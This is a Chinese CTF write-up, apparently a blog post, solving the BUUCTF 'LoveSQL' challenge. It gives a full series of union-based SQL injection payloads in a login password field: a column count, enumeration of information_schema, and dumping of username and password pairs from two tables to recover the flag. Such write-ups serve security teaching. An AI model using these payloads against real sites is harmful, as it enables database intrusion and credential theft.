【极客大挑战2019】LoveSQL解题

1、打开靶机:BUUCTF在线评测,选择web---->【极客大挑战2019】LoveSQL

打开被测试站点,是这个样子的,是上一题EasySQL的延续。

2、EasySQL那道题采用万能密码,我们也直接使用万能密码试一下,结果如下:

 直接给出了密码。

使用正确的用户名和密码登录一下,结果还是

 那使用MD5库碰撞一下,结果也没碰撞出来。

3、继续寻常注入吧。

爆破有多少列(字段数)

username=admin&password=6ec1cab790051296b99514856f25f48b' order by 3 %23 //不报错

username=admin&password=6ec1cab790051296b99514856f25f48b' order by 4 %23 //报错

 可知一共有3列。

爆破注入点

username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,3 %23

爆破数据库

username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,database() %23

爆破表名

username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,group_concat(table_name)  from information_schema.tables where table_schema=database()  %23  

 先爆表geekuser字段名

username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,group_concat(column_name)  from information_schema.columns where table_schema=database() and table_name='geekuser'   %23  

 在爆破表l0ve1ysq1字段

username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,group_concat(column_name)  from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'   %23  

两个表的字段,都是id,username,password

爆表geekuser数据

username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,group_concat(username,0x3a,password)  from geekuser   %23  

 结果不是我们想要的。

继续爆表l0ve1ysq1数据

username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,group_concat(username,0x3a,password)  from l0ve1ysq1   %23  

 爆出flag。

  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值